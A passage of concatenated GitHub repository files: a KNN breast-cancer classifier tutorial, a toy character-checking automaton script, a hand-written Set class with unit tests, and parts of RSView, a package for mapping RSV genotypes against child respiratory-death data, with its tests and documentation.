"text": "#requirements \nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport seaborn as sns\nsns.set()\n\n#we first load our dataser into dataframes\nbreast_cancer = load_breast_cancer()\nX = pd.DataFrame(breast_cancer.data, columns=breast_cancer.feature_names)\nX = X[['mean area', 'mean compactness']]\ny = pd.Categorical.from_codes(breast_cancer.target, breast_cancer.target_names)\ny = pd.get_dummies(y, drop_first=True)\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=1)\n\n\n\nthinkAI_knn = KNeighborsClassifier(n_neighbors=5, metric='euclidean')\nthinkAI_knn.fit(X_train, y_train)\n\n\n\ny_pred = thinkAI_knn.predict(X_test)\n\n\n#we compare the prediction results with the actual ones \n\nsns.scatterplot(\n x='mean area',\n y='mean compactness',\n hue='benign',\n data=X_test.join(y_test, how='outer')\n)\n\n\n\n\nplt.scatter(\n X_test['mean area'],\n X_test['mean compactness'],\n c=y_pred,\n cmap='coolwarm',\n alpha=0.7\n)\n\n\n# another way to calculate precision is confusion matrix\n\n\nconfusion_matrix(y_test, y_pred)\n\n\n# In[ ]:\n\n\n\n\n"
},
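Editorial aside: `KNN.py` ends by computing a confusion matrix but never reduces it to a single score. A short follow-on sketch (standard arithmetic, not repo code; `y_test` and `y_pred` are the variables defined above):

```python
# Accuracy from a confusion matrix: correct predictions sit on the diagonal.
import numpy as np
from sklearn.metrics import accuracy_score, confusion_matrix

def accuracy_from_confusion(cm):
    return np.trace(cm) / cm.sum()

# With KNN.py's variables in scope, the two values below should agree:
# cm = confusion_matrix(y_test, y_pred)
# print(accuracy_from_confusion(cm), accuracy_score(y_test, y_pred))
```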
{
"alpha_fraction": 0.7214285731315613,
"alphanum_fraction": 0.7397959232330322,
"avg_line_length": 30.483871459960938,
"blob_id": "6202c3023cb558c15294edc49da4108df4922250",
"content_id": "841bb0a28faa5b84039962815ee0435d46433fe8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 31,
"path": "/README.md",
"repo_name": "ThinkAI-GP/KNN",
"src_encoding": "UTF-8",
"text": " # KNN\n A non-parametric method used for classification and regression\n\n\n\n# ***KNN algorithm:***\n\nA simple example of KNN in breast cancer classification implemented through python.\n\n## _requirements:_\n`python 3+`\n`pandas 0.25.1`\n`sklearn 0.21.3`\n`matplotlib 3.0.2`\n\n## _installation:_\n- pip install `pandas`\n- pip install `sklearn`\n- pip install `matplotlib`\n(you can use `conda` instead of `pip` in the `anaconda` environement)\n\n## _usages:_\nRun the command `python KNN.py` \n(you may try `py KNN.py` if the command aside doesn't work)\n# OR if you are using anaconda + jupyter\nJust load the file KNN.ipynb in jupyter \n\n## _references:_\n- [Wikipedia](https://en.wikipedia.org/wiki/K-nearest_neighbors_algorithm) gives a good description on the idea behind\n- you can check the full explanation of the code source [Here](https://towardsdatascience.com/k-nearest-neighbor-python-2fccc47d2a55) .\nOpen the link in incognito mode if you are having trouble to access the full content \n\n\n"
}
] | 2 |
Kevin-Contreras/TAREAS
|
https://github.com/Kevin-Contreras/TAREAS
|
c0cc3bf2ea9a43f50eebd098b52a47ff723ed407
|
1e8e75c84b980a5e3aa666e692414ff0ab2b5919
|
8c3ef7ebc077fd20ac63df7ab726a14676bc66c4
|
refs/heads/master
| 2022-12-07T21:08:33.202217 | 2020-09-06T10:32:35 | 2020-09-06T10:32:35 | 293,253,549 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4581589996814728,
"alphanum_fraction": 0.47350069880485535,
"avg_line_length": 28.285715103149414,
"blob_id": "aa45161ad3c2188571fc96abd0a3477f30bf6283",
"content_id": "52fae029511cdecc66d3bf86b01ae23680e5b77e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1434,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 49,
"path": "/TAREA5/AUTOMATA.PY",
"repo_name": "Kevin-Contreras/TAREAS",
"src_encoding": "UTF-8",
"text": "print (\"colocar las palabras\")\npalabras = input()\ndef automata ():\n letras=[];\n numeroletras = 0\n contador =0;\n contador2 =0;\n for letra in palabras:\n letras.append(letra)\n numeroletras+=1\n if(letra == \"_\"):\n print(\"si pertenece a la sintaxis-----\" + letra)\n else:\n if(letra.isalpha()==True):\n if(contador2==0):\n contador2=1\n print(\"pertenece a la sintaxis ---- \"+ letra)\n else:\n print(\"no pertenece a la sintaxis----- \" + letra)\n else: \n if(letra.isnumeric()):\n if(contador==0):\n contador=1\n print(\"el numero pertenece a la sintaxis---- \"+ letra)\n else:\n print(\"el numero no pertenece a la sintaxis---- \"+ letra) \n print(\"*******************Sintaxis error********************\")\ndef automata2():\n letras=[];\n numeroletras = 0\n contador =0;\n contador2 =0;\n y=0;\n for letra in palabras:\n if(letra.isalpha()):\n print (\"la sintaxis es correcta---\" + letra)\n else:\n if(y == 0):\n print(\"sintaxis no reconcocida---\" + letra)\n y=1\n else:\n if(letra.isnumeric()):\n print(\"sintaxis reconocida\")\n print(\"**********************Sintaxis error*********************\")\n\nprint(\"-------------------camino 1----------------------------\") \nautomata() \nprint(\"-------------------camino 2---------------------------\")\nautomata2()"
}
] | 1 |
reneighbor/set-python
|
https://github.com/reneighbor/set-python
|
44ed40132fb1a4c8fcc4067721486c4197863d98
|
6c2778e52d147e823bae941c1c81b8ea902c857c
|
c54aad78656777e9330574178ec5c720fa069d8b
|
refs/heads/master
| 2019-01-02T06:32:59.701907 | 2015-09-15T07:01:12 | 2015-09-15T07:01:12 | 42,341,262 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5012701153755188,
"alphanum_fraction": 0.5416314005851746,
"avg_line_length": 24.314285278320312,
"blob_id": "2d73c2c782785d0ba372146fbaa56b73da011da4",
"content_id": "7dd4525bcd2171626376a4bdd1001cb857bbda08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3543,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 140,
"path": "/tests.py",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom _set import Set\n\nclass SetTest(unittest.TestCase):\n\n def test_construct_empty(self):\n test_set = Set()\n\n assert test_set.elements == []\n\n def test_construct_initial_elements(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.elements == [1, 2, 3]\n\n def test_construct_initial_elements_duplicates(self):\n test_set = Set([1, 2, 2])\n\n assert test_set.elements == [1, 2]\n\n def test_add(self):\n test_set = Set([1, 2, 3])\n test_set.add(4)\n\n assert test_set.elements == [1, 2, 3, 4]\n\n def test_add_duplicate(self):\n test_set = Set([1, 2, 3])\n test_set.add(3)\n\n assert test_set.elements == [1, 2, 3]\n\n def test_remove(self):\n test_set = Set([1, 2, 3])\n test_set.remove(3)\n\n assert test_set.elements == [1, 2]\n\n def test_remove_not_present(self):\n test_set = Set([1, 2, 3])\n test_set.remove(4)\n\n assert test_set.elements == [1, 2, 3]\n\n def test_len(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.len() == 3\n\n def test_len_zero(self):\n test_set = Set()\n\n assert test_set.len() == 0\n\n def test_contains(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.contains(1)\n\n def test_contains_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.contains(4) == False\n\n def test_equals(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals(Set([1, 2, 3]))\n\n def test_equals_wrong_class(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals([1, 2, 3]) == False\n\n def test_equals_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.equals(Set([1, 2])) == False\n\n def test_subset_of(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2, 3, 4]))\n\n def test_subset_of_equivalent(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2, 3]))\n\n def test_subset_of_false(self):\n test_set = Set([1, 2, 3])\n\n assert test_set.subset_of(Set([1, 2])) == False\n\n def test_union(self):\n test_set = Set([1, 2, 3])\n union_set = test_set.union(Set([4, 5]))\n\n # TODO ASK is it a problem that this fails?\n # assert union_set == Set([1, 2, 3, 4, 5])\n assert union_set.equals(Set([1, 2, 3, 4, 5]))\n\n def test_union_duplicates(self):\n test_set = Set([1, 2, 3])\n union_set = test_set.union(Set([1, 2]))\n\n # TODO ASK is it a problem that this fails?\n # assert union_set == Set([1, 2, 3])\n assert union_set.equals(Set([1, 2, 3]))\n\n def test_intersect(self):\n test_set = Set([1, 2, 3])\n intersect_set = test_set.intersect(Set([1, 2, 4]))\n\n assert intersect_set.equals(Set([1, 2]))\n\n def test_intersect_empty_set(self):\n test_set = Set([1, 2, 3])\n intersect_set = test_set.intersect(Set())\n\n assert intersect_set.equals(Set())\n\n def test_intersect_no_matches(self):\n test_set = Set([1, 2, 3])\n intersect_set = test_set.intersect(Set([4, 5]))\n\n assert intersect_set.equals(Set())\n\n def test_difference(self):\n test_set = Set([1, 2, 3])\n difference_set = test_set.difference(Set([1, 2, 4]))\n\n assert difference_set.equals(Set([3, 4]))\n\n def test_difference_all_matches(self):\n test_set = Set([1, 2, 3])\n difference_set = test_set.difference(Set([1, 2, 3]))\n\n assert difference_set.equals(Set())"
},
{
"alpha_fraction": 0.7431851029396057,
"alphanum_fraction": 0.7431851029396057,
"avg_line_length": 68.69999694824219,
"blob_id": "8cb6d577c43a2d60b978266e8a1a96ad90cbf4fa",
"content_id": "9e80ed7158c04942860d93930ddae8cbf57cb54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 697,
"license_type": "no_license",
"max_line_length": 294,
"num_lines": 10,
"path": "/README.md",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "# set-python\nWriting a set from scatch in Python\n\nDescription\n=============\nA set is a data structure; it is a collection of items. It can be thought of as like a list; however, unlike a list, items in a set must be unique. If you have a set that consists of 'Jane', 'Janice', and 'John', you cannot append the name 'John' to the set, but you can append the name 'Lucy.'\n\nAdditionally, items in a set are not typically kept in any sort order, so if you put items into a set in some particular order, you cannot rely on being able to acces or retrieve them according to that order.\n\nThe task is to implement a set in Python using Test-Driven Development (TDD), but without using the set data type.\n"
},
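Editorial aside: the uniqueness rule the README describes is easy to see against the repo's own class. A quick sketch (assumes `_set.py` is importable from the working directory):

```python
from _set import Set

names = Set(["Jane", "Janice", "John"])
names.add("John")   # duplicate: silently ignored
names.add("Lucy")   # new item: appended
print(names.elements)  # ['Jane', 'Janice', 'John', 'Lucy']
```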
{
"alpha_fraction": 0.5542762875556946,
"alphanum_fraction": 0.5542762875556946,
"avg_line_length": 25.071428298950195,
"blob_id": "8bd59f3e0bcabfa1c67dce060042e4f25bd478ef",
"content_id": "40fb6bf45080e95483eb3641b2c9bc09775b6397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1824,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 70,
"path": "/_set.py",
"repo_name": "reneighbor/set-python",
"src_encoding": "UTF-8",
"text": "class Set:\n\n def __init__(self, initial_elements = []):\n self.elements = []\n\n for element in initial_elements:\n if element not in self.elements:\n self.elements.append(element)\n\n def add(self, element):\n if element not in self.elements:\n self.elements.append(element)\n\n def remove(self, element):\n if element in self.elements:\n self.elements.remove(element)\n\n def len(self):\n return len(self.elements)\n\n def contains(self, item):\n if item in self.elements:\n return True\n return False\n\n def equals(self, _set):\n if isinstance(_set, Set) == False:\n return False\n if sorted(self.elements) == sorted(_set.elements):\n return True\n return False\n\n def subset_of(self, _set):\n if isinstance(_set, Set) == False:\n return False\n for element in self.elements:\n if element not in _set.elements:\n return False\n return True\n\n def union(self, _set):\n new_set = Set(self.elements)\n\n for element in _set.elements:\n if element not in self.elements:\n new_set.elements.append(element)\n\n return new_set\n\n def intersect(self, _set):\n new_set = Set()\n\n for element in _set.elements:\n if element in self.elements:\n new_set.elements.append(element)\n\n return new_set\n\n def difference(self, _set):\n new_set = Set()\n\n for element in _set.elements:\n if element not in self.elements:\n new_set.elements.append(element)\n\n for element in self.elements:\n if element not in _set.elements:\n new_set.elements.append(element)\n \n return new_set"
}
] | 3 |
khdusenbury/RSView
|
https://github.com/khdusenbury/RSView
|
3313992a5a036d2d99423b453821249b5e12c23b
|
600a0d313df8a025d7693a09a97b8b4f3c057374
|
759746d81fb3421fbac153da507011d76fb5e71a
|
refs/heads/master
| 2020-04-03T05:13:00.188640 | 2018-12-13T08:26:51 | 2018-12-13T08:26:51 | 155,038,610 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5592977404594421,
"alphanum_fraction": 0.5634181499481201,
"avg_line_length": 41.93846130371094,
"blob_id": "57c8459d7ec1de0b7360be02a14c8a9d56df0fc1",
"content_id": "ffa1266dd0131261171bf90acd2e134278d0253d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5582,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 130,
"path": "/rsview/tests/test_map_rsv.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"\nUnittests for map_rsv.py\n\"\"\"\nimport os\nimport unittest\nfrom unittest.mock import patch\n\nimport rsview.map_rsv as map_rsv\n\nclass TestMapRsv(unittest.TestCase):\n \"\"\"\n Tests map_rsv.py\n \"\"\"\n\n def run_organize_data(self, datadir):\n \"\"\"\n Run map_rsv.organize_data function for testing\n \"\"\"\n rsv_df = map_rsv.organize_data(datadir, map_rsv.GENOTYPE_DICT)\n return rsv_df\n\n def run_count_types(self, level, datadir, genotype_level='collapse'):\n \"\"\"\n Run map_rsv.count_types function for testing\n \"\"\"\n organized_df = map_rsv.count_types(self.run_organize_data('data'), map_rsv.JITTER_DICT,\n level, datadir, genotype_level)\n return organized_df\n\n def run_map_rsv(self, level, datadir, genotype_level='collapse', years=[1980, 2018]):\n \"\"\"\n Run map_rsv.map_rsv function for testing\n \"\"\"\n fig = map_rsv.map_rsv(self.run_count_types(level, datadir, genotype_level), level,\n genotype_level, years)\n return fig\n\n def test_organize_data(self):\n \"\"\"\n Test map_rsv.organize_data function\n \"\"\"\n rsv_df = self.run_organize_data('data')\n\n self.assertEqual(list(rsv_df.columns), ['collection_date', 'country', 'subtype',\n 'genotype', 'year', 'genotype_group'])\n self.assertTrue(len(rsv_df[col].notnull()) == len(rsv_df) for col in rsv_df.columns)\n\n def test_count_types(self):\n \"\"\"\n Test map_rsv.count_types function with different arguments\n \"\"\"\n #Test that health data file exists\n self.assertTrue(os.path.isfile('data'+map_rsv.HEALTHFILE))\n #Test that latitude/longitude data file exists\n self.assertTrue(os.path.isfile('data'+'/country_centroids.csv'))\n\n #Test level='subtype'\n organized_df = self.run_count_types('subtype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'year', 'count', 'country_code', 'Longitude',\n 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype'\n organized_df = self.run_count_types('genotype', 'data')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype_group', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) == len(organized_df) for\n col in organized_df.columns)\n\n #Test level='genotype', genotype_level='all'\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n\n self.assertEqual(list(organized_df.columns),\n ['country', 'subtype', 'genotype', 'year', 'count', 'country_code',\n 'Longitude', 'Latitude', 'under_five_deaths', 'adj_lon', 'adj_lat'])\n self.assertTrue(len(organized_df[col].notnull()) ==\n len(organized_df) for col in organized_df.columns)\n\n #Don't actually produce plot, just test function components\n @patch(\"rsview.map_rsv.py.plot\")\n def test_map_rsv(self, mock_show):\n \"\"\"\n Test map_rsv.map_rsv function with different arguments\n \"\"\"\n #Test level='subtype'\n fig = self.run_map_rsv('subtype', 'data')\n\n self.assertEqual(len(fig['data']), len(self.run_count_types('subtype', 'data'))+2)\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), (int(2018-1980)+1))\n self.assertTrue('subtype' in fig['data'][0]['hovertext'])\n\n #Test level='subtype', years = 'all'\n fig = self.run_map_rsv('subtype', 'data', years='all')\n year_range = [yr for yr in range(int(self.run_count_types('subtype', 'data').year.min()),\n 
int(self.run_count_types('subtype', 'data').year.max()))]\n\n self.assertEqual(len(fig['layout']['sliders'][0]['steps']), len(year_range))\n\n #Test level='genotype'\n fig = self.run_map_rsv('genotype', 'data')\n organized_df = self.run_count_types('genotype', 'data')\n a_groups = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_groups = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_groups+b_groups))\n self.assertTrue('genotype_group' in fig['data'][0]['hovertext'])\n\n #Test level='genotype', genotype_level='all'\n fig = self.run_map_rsv('genotype', 'data', genotype_level='all')\n organized_df = self.run_count_types('genotype', 'data', genotype_level='all')\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n\n self.assertEqual(len(fig['data']), len(organized_df) +\n len(a_genotypes+b_genotypes))\n self.assertTrue('genotype' in fig['data'][0]['hovertext'])\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.7264458537101746,
"alphanum_fraction": 0.7338252663612366,
"avg_line_length": 50.114036560058594,
"blob_id": "36aeb39cc99bda5477b93ef14b7b2fb9b97c5d73",
"content_id": "947decac5ee7055027d39e74b0508a9578dc5050",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6335,
"license_type": "permissive",
"max_line_length": 1082,
"num_lines": 114,
"path": "/README.md",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": " \n\n## Visualize RSV global distribution and disease severity\n\nAuthors: Kate Dusenbury, Katie Kistler, Jilliane Bruffey\n\nProject for CSE 583. \n\n\n## Background \n\nRespiratory syncytial virus (RSV) is a common respiratory virus that, in healthy adults, usually causes an illness similar to the common cold. However, in infants and the elderly, RSV infection can cause severe disease. RSV is the leading cause of pneumonia in infants less than one year of age and is a leading cause of hospitalization due to acute respiratory tract infections in both infants and young children. \n\nSimilar to other respiratory viruses, such as influenza, RSV circulates globally and with distinct seasonality. RSV generally circulates in the winter months in temperate climates and during the monsoon season in the tropics. Additionally, RSV has two distinct subtypes - A and B - and several genotypes. In any given location, it is generally thought that a single subtype will dominate the RSV season and that the dominant subtype cycles overtime with RSV A seasons giving way to RSV B seasons and vice versa. Furthermore, within each subtype, RSV genotypes appear to replace each other over time. Whether this evolution is due to selection from immune pressure or genetic drift is not fully understood, but RSV does appear to have a distinct pattern of infection over space and time, at least at the local level. A larger analysis of RSV sequencing data to look at patterns of subtype cycling and genotype replacement at a global level is lacking and would be an important resource to better understand the evolution and overarching dynamics of this important respiratory virus. \n\nFurthermore, it is known that for some respiratory viruses, such as rhinovirus, different subtypes or genotypes have different clinical severities. As such, we aim to examine if the subtype and genotype of RSV circulating in a particular location correlates with disease severity as determined by the number of children under 5 years old that die due to acute respiratory tract infection (ARTI). We realize that using deaths due to ARTI in children under 5 is an imperfect estimate of RSV disease burden, but believe this to be an appropriate surrogate due to the high RSV disease burden in this age group. Any large effects of genotype on disease severity should be noticeable with this coarse grain analysis.\n\nTogether our project, ``RSView``, will provide an important resource for better understanding the global circulation dynamics of RSV and investigating the effects of genotype on disease severity. We recognize that this is very much a \"first-pass\" analysis, but believe these analyses and, especially, this framework for examining RSV (which is modeled off of the nextstrain.org platform developed by Trevor Bedford and Richard Neher) could prove quite useful for the field.\n\n\n## Directory Structure\n\n### rsview\nThis directory includes code to download and prepare both the genotype and health data, as well as code to generate functional plots for analyzing the datasets both individually and as an integrated dataset.\n\n- data: includes the raw health data set as well as downloaded RSV genotype data sets\n\n- tests: unittests for the scripts included in RSView\n\n### examples\nThis contains a jupyter notebook with example usage of the code containing in RSView as well as several graphs generated from these datasets\n\n### docs\nThis includes component and functional specifications, including a description of expected use cases. 
\n\nThe documentation can be rendered into .html format. Follow the instructions in the README.rst rile in the docs directory.\n\n\n## Installation\n\nTo install and run `rsview` perform the following steps:\n\n* clone the repo: git clone https://github.com/khdusenbury/RSView.git\n\n* create and activate the conda environment in the `environment.yml`:\n * `conda env create -f environment.yml`\n * `source activate rsview`\n\n* install `rsview` by running `python setup.py install` within the cloned ``RSView`` directory\n\n* create a plot.ly account [here](https://plot.ly/). Follow [these](https://plot.ly/python/getting-started/#initialization-for-online-plotting) instructions for adding your plot.ly API key to your `~/.plotly/.credentials` file\n\nModules can then be run based on user needs.\n\nTo replicate our analyses:\n\n* run `seq_download.py` with `--query 'human respiratory syncytial virus G'`\n\n* run `genotype.py` \n\n* run `map_rsv.py` and/or `plot_rsv.py` with appropriate arguments.\n\n## Repository structure\n```bash\nRSView/\n├── LICENSE\n├── README.md\n├── docs\n│ ├── ComponentSpecs.md\n│ ├── FunctionalSpecs.md\n│ └── rsview_technology_review.pdf\n├── environment.yml\n├── examples\n│ ├── correlation_year.png\n│ ├── maprsv_2011.png\n│ ├── rsvplot_highlight.png\n│ └── rsvplot_time.png\n├── logo_rsview.png\n├── logo_rsview_small.png\n├── rsview\n│ ├── __init__.py\n│ ├── _metadata.py\n│ ├── data\n│ │ ├── RSVG_all_genotyped.csv\n│ │ ├── RSVG_gb_metadata_0-5000.csv\n│ │ ├── RSVG_gb_metadata_10000-15000.csv\n│ │ ├── RSVG_gb_metadata_15000-20000.csv\n│ │ ├── RSVG_gb_metadata_5000-10000.csv\n│ │ ├── country_centroids.csv\n│ │ ├── health_data_RAW.csv\n│ │ ├── health_data_all.csv\n│ │ ├── health_data_summary.csv\n│ │ └── seqs\n│ │ ├── G_all_aligned.fasta\n│ │ ├── G_long_all_aligned.fasta\n│ │ ├── G_longtyped_aligned.fasta\n│ │ ├── G_seqs_long_nogt.fasta\n│ │ ├── G_seqs_longtyped.fasta\n│ │ └── G_seqs_short.fasta\n│ ├── genotype.py\n│ ├── health_download.py\n│ ├── map_rsv.py\n│ ├── parsearguments.py\n│ ├── plot_correlation.py\n│ ├── plot_rsv.py\n│ ├── rsview_demo.ipynb\n│ ├── seq_download.py\n│ └── tests\n│ ├── __init__.py\n│ ├── test_genotype.py\n│ ├── test_map_rsv.py\n│ └── test_seq_download.py\n└── setup.py\n```\n"
},
{
"alpha_fraction": 0.7563652396202087,
"alphanum_fraction": 0.762071967124939,
"avg_line_length": 67.98484802246094,
"blob_id": "975cadcc93682d820dc6e673dbd42b07af855ff0",
"content_id": "c9932df56826767c5cb5e3370b1e2d57bac6ae72",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 4556,
"license_type": "permissive",
"max_line_length": 372,
"num_lines": 66,
"path": "/docs/ComponentSpecs.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "=======================\nComponent Specification\n=======================\n\nThe package ``RSView`` analyzes RSV G gene sequences in conjunction with information on the burden of disease (as extrapolated from childhood death rates due to acute respiratory tract infection) in order to better understand global RSV circulation dynamics and the role of RSV subtype on disease severity. In order to carry out the analysis, this package must be able to:\n \n 1. Download RSV G gene sequences and appropriate metadata\n 2. Tabulate this data and organize by genotype, collection date, and country\n 3. Plot this RSV genotype data by location and year (on an interactive map)\n 4. Compare RSV genotype data with disease severity metrics. \n\n\nSoftware Components\n-------------------\n- Argument Parser: `parsearguments.py` will handle user input\n\n- Sequence Downloader: with `seq_download.py`, the user can download the RSV genotype and subtype data from GenBank and process it into a usable format\n\n- Genotype Assigner: `genotype.py` will assign genotypes to RSV G sequences. This program relies on some sequences already being genotyped. It will only add sequences to a genotype that already has a high quality (< 60 gaps in the alignment) sequence in the input data.\n\n- Health Data Processor: `health_download.py` will download and process the data on deaths resulting from acute respiratory infection into a usable dataframe.\n\n- RSV Mapper: `map_rsv.py` will map the global distribution of Respiratory Syncytial Virus (RSV) by collection date, location, and viral subtype or genotype.\n\n- Health Data Plotter: `plot_rsv.py` will plot health metrics from the health data set either using summary data for each country or yearly data for a specified country.\n\n- Health Subtype Plotter: `plot_correlation.py` will integrate the health and RSV datasets and plot health metrics as a function of the relative prevalence of subtypes A and B in that country.\n\nInteractions to Accomplish Use Cases\n------------------------------------\n\n**Use Case 1: Analyze global distribution of RSV genotypes or subtypes**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Sequence Downloader will take arguments from Argument Parser to down load sequence data from GenBank\n 3. Genotype Assigner will take arguments from the Argument Parser and data downloaded by the Sequence Downloader to assign genotypes to sequences and add them to the dataframe.\n 4. RSV Mapper will then take the downloaded sequences from Sequence Downloader and genotypes from Genotype Assigner and plot them on a world map\n\n**Use Case 2 and 3: Analyze health impact of acute respiratory infections around the world**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Health Data Processor will download the health metrics dataset and process it into a usable format\n 3. Health Data Processor will generate interactive graphs for analyzing health data on a global scale or on a country-specific, yearly basis\n\n**Use Case 4: Analyze the correlation between RSV subtype prevalence and health impact**\n\n 1. Argument Parser will handle user input for the following steps:\n 2. Sequence Downloader will take arguments from Argument Parser to down load sequence data from GenBank\n 3. Genotype Assigner will take arguments from the Argument Parser and data downloaded by the Sequence Downloader to assign genotypes to sequences and add them to the dataframe.\n 4. 
Health Data Processor will download the health metrics dataset and process it into a usable format\n 5. Health:Subtype Plotter will integrate the health and sequence datasets and generate interactive graphs for analysis of the relationship between RSV subtype prevalence and health impact in different countries, both on a summary level and as these values change from year to year.\n\nPreliminary Plans\n--------------------\n\n 1. Download RSV G gene sequences and appropriate metadata \n - Tabulate this data and organize by genotype, collection date, and country\n \n 2. Download data on childhood deaths due to pneumonia\n - Tabulate this data and align with RSV G gene sequence dataset via aggregation and/or relabeling, as necessary\n \n 3. Plot the RSV genotype data by location and year\n - Add interactive components to map to enable display of subsets of data (i.e. year, subtype, genotype)\n \n 4. Add disease severity metrics to the interactive map display\n - Compare RSV genotype data with disease severity metrics. \n\n"
},
{
"alpha_fraction": 0.6542056202888489,
"alphanum_fraction": 0.6542056202888489,
"avg_line_length": 32.78947448730469,
"blob_id": "9fc2c0641edeb7d9cf12a923762a4a269d0e9eed",
"content_id": "57fbe97d28198ac6177cd3b576f08898339b9ba0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 642,
"license_type": "permissive",
"max_line_length": 206,
"num_lines": 19,
"path": "/docs/README.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "==============================\nDocumentation for ``RSView``\n==============================\n\nThe documentation is written in `reStructuredText` and can be built via `sphinx`.\n\nBuilding the documentation\n----------------------------\nTo build the documentation, you will need to have installed:\n\n * `sphinx`\n\nThis is included in the `rsview` conda environment.\n\nOnce the environment is properly setup and acitvated, and the `rsview`package has been installed by running `python setup.py install` within the ``RSView`` directory, you can build the documentation with::\n\n make html\n\nThe HTML documentation will then be in ``./_build/html/``.\n"
},
{
"alpha_fraction": 0.38679245114326477,
"alphanum_fraction": 0.38679245114326477,
"avg_line_length": 16.33333396911621,
"blob_id": "be3b6ce5ffde403f9ba930da9e0578b798fcdd71",
"content_id": "daa670a483bce8bcb32c8f0f669f0784da089125",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 106,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 6,
"path": "/docs/seq_download.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===================\n``seq_download.py``\n===================\n\n.. automodule:: seq_download\n :members:\n\n\n"
},
{
"alpha_fraction": 0.4051724076271057,
"alphanum_fraction": 0.4051724076271057,
"avg_line_length": 18.33333396911621,
"blob_id": "d8eab4e9a619407ee68e277691898121c419ac30",
"content_id": "68fb4be4248982b6b07f3d2898a1d7507f6114dd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 116,
"license_type": "permissive",
"max_line_length": 31,
"num_lines": 6,
"path": "/docs/health_download.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "======================\n``health_download.py``\n======================\n\n.. automodule:: health_download\n :members:\n"
},
{
"alpha_fraction": 0.5920528173446655,
"alphanum_fraction": 0.6007723212242126,
"avg_line_length": 49.49056625366211,
"blob_id": "d909f2ea1ffa527069178d106a381c1ffa80d1f7",
"content_id": "91857c3c763a2a7f6330ab0e3d530a19939dc8bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8028,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 159,
"path": "/rsview/parsearguments.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
